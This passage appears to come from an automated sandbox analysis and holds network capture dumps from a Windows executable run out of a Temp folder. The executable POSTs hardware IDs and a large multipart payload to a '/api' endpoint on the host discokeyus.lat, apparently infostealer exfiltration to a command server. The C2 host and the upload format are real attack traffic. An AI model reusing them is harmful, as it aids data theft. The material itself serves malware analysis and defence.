                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 61 35 71 74 73 4e 61 38 33 50 50 48 78 76 62 72 39 41 43 4e 63 58 7a 46 79 37 45 76 36 45 4c 5a 30 2f 49 62 2f 46 4a 6b 39 39 63 69 68 6f 6d 5a 77 2f 48 35 79 73 72 65 37 6f 37 56 51 59 33 78 32 4a 32 50 58 52 76 34 43 38 47 43 78 6c 62 41 55 6b 33 6d 74 67 36 32 6b 62 32 66 79 66 6a 72 34 2f 72 79 2f 2f 77 55 6b 57 6c 41 34 64 4f 46 47 2b 52 36 77 63 2f 43 4c 2b 42 79 62 4f 66 71 44 36 4f 78 6e 62 62 63 76 63 74 7a 38 71 70 72 37 41 7a 45 61 53 6e 74 6f 70 55 2f 78 57 65 67 2f 38 59 58 78 47 35 45 31 2f 63 65 30 72 47 74 38 2b 48 59 39 2f 50 53 39 73 66 30 61 4a 56 70 65 50 58 62 74 54 50 4d 4c 73 58 43 2f 77 72 41 55 68 33 6d 74 67 35 65 36 5a 33 4c 34 4e 52 76 37 37 4c 32 78 39 67 4d 76 47 6b 70 37 61 4b 56 50 38 56 6e 6f 50 2f 4b 41 2f 52 65 4e 4e 66
                                                                                                                                                                                                                                                            Data Ascii: a5qtsNa83PPHxvbr9ACNcXzFy7Ev6ELZ0/Ib/FJk99cihomZw/H5ysre7o7VQY3x2J2PXRv4C8GCxlbAUk3mtg62kb2fyfjr4/ry//wUkWlA4dOFG+R6wc/CL+BybOfqD6Oxnbbcvctz8qpr7AzEaSntopU/xWeg/8YXxG5E1/ce0rGt8+HY9/PS9sf0aJVpePXbtTPMLsXC/wrAUh3mtg5e6Z3L4NRv77L2x9gMvGkp7aKVP8VnoP/KA/ReNNf
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 4f 44 58 38 65 54 66 39 2b 37 61 38 2b 78 6f 69 55 46 6b 30 64 75 4a 44 37 78 4b 69 64 50 65 50 2f 68 75 57 4f 66 76 44 70 36 46 67 4e 62 6b 33 4e 65 53 33 35 50 76 51 4b 7a 52 4d 58 33 64 53 38 6c 37 33 48 72 78 70 39 49 33 7a 42 5a 49 70 74 59 33 6d 76 57 64 6b 74 79 38 6b 37 4f 43 37 70 4c 73 52 59 31 31 5a 64 53 6d 6c 51 2f 49 58 76 58 54 37 68 66 55 62 6e 44 7a 77 79 61 71 67 59 58 33 2b 66 54 66 35 38 62 61 34 2b 77 63 69 56 6c 45 38 66 2b 77 49 73 31 6d 33 5a 37 2f 55 73 43 57 50 50 75 33 4f 74 75 35 53 64 75 5a 6d 4a 2f 48 6e 75 76 6e 61 43 79 39 5a 55 44 4a 68 70 56 65 7a 41 50 42 34 38 38 79 6f 55 35 38 39 2b 63 43 68 6f 6d 39 34 2b 48 41 35 38 2f 32 79 71 66 6f 4e 4b 31 5a 64 4f 47 50 76 51 75 38 51 75 58 4c 78 68 4f 49 51 33 33 65 31 78 4c 37
                                                                                                                                                                                                                                                            Data Ascii: ODX8eTf9+7a8+xoiUFk0duJD7xKidPeP/huWOfvDp6FgNbk3NeS35PvQKzRMX3dS8l73Hrxp9I3zBZIptY3mvWdkty8k7OC7pLsRY11ZdSmlQ/IXvXT7hfUbnDzwyaqgYX3+fTf58ba4+wciVlE8f+wIs1m3Z7/UsCWPPu3Otu5SduZmJ/HnuvnaCy9ZUDJhpVezAPB488yoU589+cChom94+HA58/2yqfoNK1ZdOGPvQu8QuXLxhOIQ33e1xL7
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 48 6c 77 7a 65 47 78 71 2f 59 4e 4a 47 52 72 4f 33 62 78 54 2f 4d 66 73 44 2b 78 7a 50 39 54 78 77 43 31 69 2b 61 54 4c 6a 58 76 4e 32 71 38 77 72 2b 31 2b 77 38 31 53 78 67 57 5a 76 4e 43 35 6c 75 57 65 4f 36 46 35 68 36 4e 65 62 75 44 6f 4f 77 34 4a 62 6b 33 4e 75 32 33 35 4f 75 6e 55 33 59 4a 41 6d 55 6a 2b 67 62 6b 57 61 59 2f 70 39 36 2b 55 34 31 35 72 59 50 68 72 33 4a 6e 38 58 51 6b 2f 37 43 43 68 64 55 44 4e 56 74 59 50 6e 33 62 64 75 67 61 76 6e 48 34 6d 75 46 54 30 58 6e 36 67 2f 36 56 49 44 32 33 53 48 79 38 37 2f 7a 6a 74 54 30 67 56 46 73 79 5a 2f 51 46 33 52 4b 6d 66 76 4b 48 2f 46 47 65 4e 4f 58 45 35 75 49 67 63 37 63 76 59 72 4b 33 75 4b 71 31 55 48 4d 49 44 6d 41 69 73 68 69 76 42 76 35 6d 76 35 71 77 53 38 31 33 74 64 48 6d 39 43 41 79
                                                                                                                                                                                                                                                            Data Ascii: HlwzeGxq/YNJGRrO3bxT/MfsD+xzP9TxwC1i+aTLjXvN2q8wr+1+w81SxgWZvNC5luWeO6F5h6NebuDoOw4Jbk3Nu235OunU3YJAmUj+gbkWaY/p96+U415rYPhr3Jn8XQk/7CChdUDNVtYPn3bdugavnH4muFT0Xn6g/6VID23SHy87/zjtT0gVFsyZ/QF3RKmfvKH/FGeNOXE5uIgc7cvYrK3uKq1UHMIDmAishivBv5mv5qwS813tdHm9CAy
                                                                                                                                                                                                                                                            2024-12-21 21:18:02 UTC1369INData Raw: 6e 30 72 62 6a 31 41 32 4d 55 46 54 4d 78 76 52 71 7a 57 62 52 75 76 39 53 67 51 63 52 73 70 70 54 32 2f 6e 38 37 37 6a 63 6b 76 4b 2f 75 39 62 55 61 59 77 49 56 63 6e 4c 33 57 76 73 61 70 6e 79 34 73 73 34 31 6e 44 37 7a 77 4b 69 37 63 54 66 59 64 44 6e 77 2b 37 75 74 79 7a 59 32 57 56 73 37 64 76 4e 5a 76 56 66 77 63 4c 2f 55 79 56 4f 4f 4d 2f 4b 50 37 75 42 78 5a 76 6c 38 4a 50 75 33 67 2f 57 31 45 47 4d 43 46 51 42 79 36 30 62 36 44 36 45 79 32 59 2f 33 46 5a 77 33 34 74 4c 6d 34 69 42 7a 74 79 39 67 73 72 65 34 71 72 56 51 63 77 67 4f 59 43 4b 79 47 4b 38 47 2f 6d 61 2f 6d 72 42 4c 7a 48 65 31 30 65 62 30 49 44 4c 35 65 6a 50 2f 2b 62 2b 70 35 77 34 67 54 46 5a 79 54 39 74 74 38 42 53 31 63 66 69 79 7a 6a 4b 56 4b 66 6a 4d 6f 5a 4a 65 51 75 5a 77 49
                                                                                                                                                                                                                                                            Data Ascii: n0rbj1A2MUFTMxvRqzWbRuv9SgQcRsppT2/n877jckvK/u9bUaYwIVcnL3Wvsapny4ss41nD7zwKi7cTfYdDnw+7utyzY2WVs7dvNZvVfwcL/UyVOOM/KP7uBxZvl8JPu3g/W1EGMCFQBy60b6D6Ey2Y/3FZw34tLm4iBzty9gsre4qrVQcwgOYCKyGK8G/ma/mrBLzHe10eb0IDL5ejP/+b+p5w4gTFZyT9tt8BS1cfiyzjKVKfjMoZJeQuZwI


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            51192.168.2.449942104.21.21.99443944C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=AKWTS9R9AQFWVOJU7IC
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 148778
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: 2d 2d 41 4b 57 54 53 39 52 39 41 51 46 57 56 4f 4a 55 37 49 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 4b 57 54 53 39 52 39 41 51 46 57 56 4f 4a 55 37 49 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4b 57 54 53 39 52 39 41 51 46 57 56 4f 4a 55 37 49 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                            Data Ascii: --AKWTS9R9AQFWVOJU7ICContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--AKWTS9R9AQFWVOJU7ICContent-Disposition: form-data; name="pid"1--AKWTS9R9AQFWVOJU7ICContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: d3 bf e9 5d 4b 5c 8f 54 c1 59 4d 49 38 c3 a1 ad f7 66 1e ab 78 b7 ef e9 37 b3 26 9e f0 0d 19 0a 39 a1 43 9a fc b8 6f e2 ed a8 45 07 56 36 4a 93 e2 cf c7 0d 5a 1a 7c 78 99 ca ad 64 7e 2f 8c 8f 94 f1 e4 00 1f 2e 2c b6 82 8f 56 bb 30 cc 64 ca 77 36 1f 49 de eb f6 3f f6 4f 79 1a c4 89 f5 38 30 fc 96 66 a4 34 2f e6 3e 23 29 47 fa 84 18 20 ef 88 65 89 c8 e4 bb e7 d0 ab fd a1 79 95 84 6f ce 23 ba c5 d4 23 3c 3b a3 46 92 24 90 99 7f 46 55 a4 46 59 f9 5c 6b a0 37 90 c9 01 9d 80 1e 09 9a 79 c2 79 fa c7 b7 85 ee 0d 1d e4 f4 b0 26 e0 a8 2f f6 e3 7b 07 66 07 1a 3b 1a 39 d9 9d 8c d4 c4 a7 b2 15 a5 0f 5e 4c d5 db d0 32 4a bb 21 54 20 ef a6 aa 6c 08 76 a6 ea b3 63 99 26 49 ea cd 1b 46 2f 97 e9 a0 5f 53 c5 fd 51 eb 94 b5 3a 03 b4 82 96 30 2d 11 22 dd 8f 44 83 e4 7d 74 98
                                                                                                                                                                                                                                                            Data Ascii: ]K\TYMI8fx7&9CoEV6JZ|xd~/.,V0dw6I?Oy80f4/>#)G eyo##<;F$FUFY\k7yy&/{f;9^L2J!T lvc&IF/_SQ:0-"D}t
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: d8 23 0b 13 03 24 b0 c4 9f 62 79 d3 70 44 aa 3c aa 3a a3 e1 01 48 21 1b f4 78 1b d4 71 c4 98 2c 9f 81 8b 1a 9a 9e d0 dc c9 30 0a ff 0d c5 dd 20 97 9f 16 e2 77 2b 54 a0 c3 31 de e4 82 ea e7 6f cf d6 87 4e 86 63 72 86 8a 51 70 06 45 8b 80 33 0e 22 7a d1 68 95 18 26 45 ca a4 3b f4 23 62 f0 39 e8 5e 3d 75 e3 cf 4d d5 75 5c 44 85 66 3b cd 61 8c 32 90 9a 9c 6c ed 97 66 0a 25 99 a7 bf 68 3f fc af 92 79 c9 a5 fd 02 82 5b b0 67 cf 75 86 33 e8 30 91 42 b6 5e 14 09 73 a1 b4 c4 95 53 02 d8 b0 ea 2a 3c 40 c8 13 9f 7a 15 4c 09 33 77 c5 93 18 e8 ca a8 b9 97 7f 2e 40 7d 06 76 f0 80 c3 b8 7c 2c a1 f5 fb 3c ec b5 2f b9 25 76 87 ad 9e 30 b3 e0 7d 5b 0c 3f b9 3e b3 16 9b dd 9b 92 7a b3 7e 98 70 34 65 9b 33 52 9c 13 a0 ce ae 12 9b 87 47 49 5e b6 f7 e5 13 b0 2d 62 29 78 bc 7d
                                                                                                                                                                                                                                                            Data Ascii: #$bypD<:H!xq,0 w+T1oNcrQpE3"zh&E;#b9^=uMu\Df;a2lf%h?y[gu30B^sS*<@zL3w.@}v|,</%v0}[?>z~p4e3RGI^-b)x}
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: a1 c3 c2 e5 cf 90 bf 05 7c ab 06 73 0b 9a 10 28 0d 88 3e 11 ac 2e af 8d 9c b8 10 d9 7f e3 28 24 43 59 de cd b9 d4 5c f5 b0 29 4d 96 ac fc 22 6c a9 b9 c2 bc c9 09 19 81 ea 7f b5 9f 6d ca ff be f6 68 e9 3f 07 b9 fa 80 35 c2 d6 23 2d fa a4 99 23 5b 5a 2e 6f 2a 84 23 53 5a 93 ad 3e ff f6 07 59 f3 36 89 e5 db 79 19 81 1e 0d 02 81 55 3e 5f bd 20 1f e2 0d a4 14 e9 52 06 13 d5 d0 14 3c c6 82 bf 30 db 5e a6 fa ea e4 6c a1 8e be b9 cc 59 f3 9c 1a a9 f4 6a fe 7d 03 e3 3f 3c 91 e2 aa 1c 17 50 e3 fd 12 a6 34 8d fa 06 11 cc 23 87 f9 e4 5f 2d c3 1b f6 6b 2d 13 85 a6 d2 d9 f6 db 3e 91 09 7c 78 a1 59 eb 2a 40 73 79 ef e8 d3 82 fd 55 36 41 c8 ae cf de 3f ca e0 1e a0 12 17 68 ce e6 68 9e 10 ee 04 11 85 08 7e 10 99 09 85 0b 9d 9c 3a df 73 0e 06 6b 6b 45 ab 9a 1c 06 62 e0 f0
                                                                                                                                                                                                                                                            Data Ascii: |s(>.($CY\)M"lmh?5#-#[Z.o*#SZ>Y6yU>_ R<0^lYj}?<P4#_-k->|xY*@syU6A?hh~:skkEb
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: 95 5f 78 8b 23 8b e4 11 ab 85 da 2c fe cf c6 bb 5f 7c 15 87 a6 f7 62 48 68 13 e4 b5 b8 ef 12 e1 97 47 78 a6 4f 84 7f 6f e0 49 34 bd cf 6b f2 53 ae 9d 96 50 71 0d b1 50 bd 68 64 45 a7 9c a8 76 08 92 01 a8 0e b0 75 e0 87 24 88 39 df c1 ae b2 d1 12 f0 bf d5 e3 b8 46 46 82 81 0b 1a 28 33 fd 08 83 53 4d 8f 0b 3f 8b 74 d7 07 1b 6c 96 b4 72 04 d3 9c 2d 01 92 ff f3 b0 6d 80 73 2f 1e 92 d9 10 0e 42 8a b2 3e e4 65 99 e1 47 e4 85 62 fd 03 b1 20 e4 50 97 ca d1 5a 83 a2 e1 75 13 e4 c9 88 a8 e7 d8 a8 be 67 a4 aa 8f dc 26 cc 77 af a6 54 dc ad f2 b4 b2 81 0e 9c c2 46 83 35 4a 58 5c 15 e8 52 65 c5 ae 35 01 2c 6c 92 ff d5 cb 0c 39 98 2b 10 b9 6b a3 ec 54 99 59 cc 01 97 d5 e2 10 f7 36 43 b9 d9 1a d7 d1 8c da 01 29 e0 9c dc a2 56 78 f1 21 7f 72 04 10 75 06 dc 18 e2 c5 11 0f
                                                                                                                                                                                                                                                            Data Ascii: _x#,_|bHhGxOoI4kSPqPhdEvu$9FF(3SM?tlr-ms/B>eGb PZug&wTF5JX\Re5,l9+kTY6C)Vx!ru
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: a1 8c 39 ee 71 26 5c 1d 63 b1 b8 a1 74 fd 76 42 36 52 15 77 ba bb fe 9f 20 8f 2a b4 d6 f4 8f f4 be 8d 94 2a 8f d5 97 84 c1 bd f1 9b 9a 20 11 c9 04 39 2d 2f ed aa f4 d8 5c 36 6e dd e4 28 03 7e 71 80 51 85 e0 2b 82 5c a3 b6 aa 10 74 2a 53 fa 6f 88 42 fe a6 86 82 ef 7e df 07 71 19 bb 73 71 f0 1b f9 46 90 0a 04 7e 57 cb b9 9b 55 59 7b ff f2 a5 27 ee 9f a1 7d 62 70 22 09 54 55 d7 59 fd 8a 38 6d f2 d4 07 7f 54 0c 3d 0b 9d 08 a5 37 06 fb 15 9a 1c 8e d7 66 f0 18 38 5e 37 27 32 ef 7d 7d f0 57 42 0a 79 30 0c c2 49 f9 f5 92 bc 36 8e 9a 83 27 32 87 17 45 28 5a a7 87 ec 8a dc be b5 5c 57 c5 8d 70 39 92 a7 50 82 57 73 a5 b7 da 80 d5 d9 20 5d 34 50 c3 6b c4 9f 1a e2 7b 3e ab 01 f6 e1 fc 20 60 8b da 4d 48 8b 12 55 65 a5 2c b8 03 08 7a a0 4f ef b3 52 ea 14 5a d6 b3 09 be
                                                                                                                                                                                                                                                            Data Ascii: 9q&\ctvB6Rw ** 9-/\6n(~qQ+\t*SoB~qsqF~WUY{'}bp"TUY8mT=7f8^7'2}}WBy0I6'2E(Z\Wp9PWs ]4Pk{> `MHUe,zORZ
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: d3 88 74 ef c7 15 5e 64 16 ba 59 72 d9 41 63 66 96 85 70 f7 66 76 0c cc cc ff a4 b6 c8 81 43 27 d9 39 1e cd b4 56 0e ac 81 ba 52 06 f0 88 fd ae c9 f9 5f 85 01 d0 d9 46 dd 0a d5 2e c0 59 53 19 5d 98 33 ac 00 74 6e bb 6c 7b 33 74 25 59 f2 1d 3a 8a de 95 77 56 2c f3 30 60 8a 5b 21 49 0e c3 b5 21 33 d2 bd 14 64 1d 0b 54 f1 d7 ea 7e 84 25 33 90 f1 f4 03 02 85 99 a7 53 f8 50 d3 43 4b b5 d7 a7 3a 61 c5 f6 bb fa 1b a0 a1 ca 3b f9 c5 50 79 98 75 37 c7 3e 8d 23 cc e8 71 4d cf 83 25 7b 79 ad ef 43 96 1b 7a 5d 25 68 25 d4 94 cd e6 f2 51 74 e6 4a d1 87 7c aa d3 8d 0b 81 aa 33 34 f3 9b da 1b ee f3 de 14 87 fe b2 43 a3 2d 33 51 c4 fd 0a 3a 15 a5 85 9e a3 cb 9c 03 af 51 58 92 f0 66 cb ab c0 31 1d fe b4 57 28 f7 24 43 ca e8 d7 13 9b a1 68 b1 60 d4 c1 be 93 d8 b5 d1 da a5
                                                                                                                                                                                                                                                            Data Ascii: t^dYrAcfpfvC'9VR_F.YS]3tnl{3t%Y:wV,0`[!I!3dT~%3SPCK:a;Pyu7>#qM%{yCz]%h%QtJ|34C-3Q:QXf1W($Ch`
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: 31 3d e7 30 57 3e b7 64 c7 ec f2 03 55 3f 70 7c e0 6d f1 75 4a e1 78 92 c2 95 fc 0b da b1 0a ee b1 ae 8a e8 e0 fc 9b df 57 96 85 26 99 f2 6c ca 68 71 b0 75 1c 9f f0 3a 37 90 f0 f8 bf 0a 05 8f 23 46 88 8d b6 9d 52 88 ff c2 e9 78 78 eb 65 e2 d2 25 a0 35 e5 c0 a0 f6 39 f7 e9 cb 39 05 87 93 48 cc f9 2b fe 3d 5e 15 39 4c 8d 74 38 5b ee f8 e2 f4 0a 1a 65 c5 da 7e b9 13 78 db ce db e4 4f 0f 66 dc a7 1c db 4b 72 4d 94 b6 26 3f 2c 97 dc 99 19 d4 4e 81 1e 5d 3c d4 26 78 7e 19 a1 7a 05 01 87 c3 08 b7 15 6a 50 ac c4 60 4b d5 8a dc 9c e2 af 07 c8 a7 15 fa c7 ed 76 f7 ce 5e bd 6e 57 4b 77 60 dd e0 9d 65 51 2e 46 14 a8 3c c2 7f 3f 04 b5 02 d9 6e ed de cf 4d 47 44 bc 29 7b 3e b5 08 ba 12 d7 73 1c a8 46 4b 2d cf 94 fa a6 7b f8 bb 99 ea e0 50 ab 33 f0 cb 74 4c e4 48 7b 76
                                                                                                                                                                                                                                                            Data Ascii: 1=0W>dU?p|muJxW&lhqu:7#FRxxe%599H+=^9Lt8[e~xOfKrM&?,N]<&x~zjP`Kv^nWKw`eQ.F<?nMGD){>sFK-{P3tLH{v
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC15331OUTData Raw: 14 f3 8b 85 8a 9c ce 40 de c7 87 a5 af d1 9a 60 fd dc a5 23 9c 90 84 ce b3 7f 34 3d 46 44 c0 8c 96 89 da d4 0d 6a 0d 93 2d 7e 0d 8d 5a 31 50 83 94 ee e0 4c e6 ce 70 15 30 cc e3 cd 27 84 2c 7f 1d f6 e4 ff a5 dd 2d e4 58 34 e4 a9 89 97 c6 06 71 29 24 44 fb 04 14 b5 8e 30 42 88 88 84 db 69 e4 5f c4 fa 1a 6f d8 2a a5 aa eb 5a a5 03 21 58 a1 1d d8 31 4a 97 05 b4 ea 95 fd 13 7c 18 53 29 6a db 28 1d cf bf a5 cf c0 99 df 6d f9 02 cb 28 5a fd 6b ce 7d fc 0c 8f 45 1f 8d 5b c4 5c 6f 9f 6f 45 e0 55 8a a8 fa 1d 26 7e 71 df fd b7 29 aa 82 cb 9f 63 4f c9 fc 86 2b 79 51 b1 53 16 42 64 c5 1f 5a 14 c7 9d 82 67 5c 8f 82 92 0b b0 40 ba bc 95 5f d4 53 41 ba 3c 0a 64 03 28 f0 f3 d4 3e 53 03 5b 1c e0 84 5f ca 09 0b 47 3d a9 59 d5 53 7c 69 55 dc 81 da d4 15 a5 11 af 14 d8 af 13
                                                                                                                                                                                                                                                            Data Ascii: @`#4=FDj-~Z1PLp0',-X4q)$D0Bi_o*Z!X1J|S)j(m(Zk}E[\ooEU&~q)cO+yQSBdZg\@_SA<d(>S[_G=YS|iU
                                                                                                                                                                                                                                                            2024-12-21 21:18:05 UTC10799OUTData Raw: 1b d7 f3 70 13 6b 4b 0e 5a 3a 9e b4 ed fc d8 6b c8 2d 21 34 dc a0 45 39 b1 4f ea ba 21 fe 4a 18 51 e5 f1 e4 86 cd 5e ea 2c ff a8 5e d5 ab 84 67 0e d6 d5 84 60 d6 ce a3 95 25 92 c6 87 5d 96 ab 1a 49 36 96 e4 b6 94 1a b5 c1 b5 31 3f 12 42 07 1c 95 62 d1 9b 84 64 ef f6 e7 13 ab 44 6d ca bb d5 12 1f 13 ff b3 95 c0 5f c7 d8 3c ef df 13 54 a8 7e 39 ca 0a 99 a0 a2 a2 af de 54 f3 d0 9c 8b 64 78 1a db 22 6f cd da 1c 26 77 fc 95 67 58 dd b3 e6 76 49 59 24 fb ab af 98 3a 34 e2 4c b7 20 ff f4 32 c9 7a d8 da 73 ee 99 17 36 0c d5 e4 24 c9 87 b4 db 6d cf f9 84 d7 75 0f f1 68 5d 96 fa 40 83 8e b2 f1 41 8f 90 f0 66 ff c8 a9 4f bf a3 e8 03 23 1f 5b f4 c6 fb c4 b9 08 92 cb 69 39 14 51 c7 86 f6 bd 7e ab fd ec 40 ac 6f e3 1b 82 1c 4b 34 54 b3 1a 8b 23 a6 54 0f 6a c7 ee f5 1a
                                                                                                                                                                                                                                                            Data Ascii: pkKZ:k-!4E9O!JQ^,^g`%]I61?BbdDm_<T~9Tdx"o&wgXvIY$:4L 2zs6$muh]@AfO#[i9Q~@oK4T#Tj
                                                                                                                                                                                                                                                            2024-12-21 21:18:08 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=riqea49bm2fvc1hj7jogvriahp; expires=Wed, 16 Apr 2025 15:04:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Slsu%2FTXanW15g1FW2wBuHVn7Y4SYWiTqLP9N9x7Vg3X7P5E%2FBVdN1UIPSjfADcZBthyanAsYmnjDo2uxdgDHXy4G7NCz%2F04EBJ%2BzW9Oq5buwXYvdeNzGW3hcnijocaGbwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae7166dfd8c8d-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1938&rtt_var=750&sent=83&recv=160&lost=0&retrans=0&sent_bytes=2832&recv_bytes=150114&delivery_rate=1437715&cwnd=246&unsent_bytes=0&cid=f17d7d36fe5a41b3&ts=2941&x=0"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            52192.168.2.449944104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:18:06 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=HD8JNRYR7V89
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1410
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:18:06 UTC1410OUTData Raw: 2d 2d 48 44 38 4a 4e 52 59 52 37 56 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 44 38 4a 4e 52 59 52 37 56 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 44 38 4a 4e 52 59 52 37 56 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 48 44 38 4a 4e 52 59 52 37 56 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: --HD8JNRYR7V89Content-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--HD8JNRYR7V89Content-Disposition: form-data; name="pid"1--HD8JNRYR7V89Content-Disposition: form-data; name="lid"PsFKDg--pablo--HD8JNRYR7V89
                                                                                                                                                                                                                                                            2024-12-21 21:18:07 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:07 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=49lu3qmd0h24ulq6d1hutumqeb; expires=Wed, 16 Apr 2025 15:04:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejHD5alWdh5sllMCQlbUdB5L7otq7Un%2FPScOYr8iYxRG5xW7Tb7mNIE0%2FFoE9m9ES7bLzMCI5u9%2Bzc3%2FtZqJeRbMDQhhXvMBvzjx2mVQy1lfuB32Oplr%2FXcsap6qculcVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae71a2ada41de-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
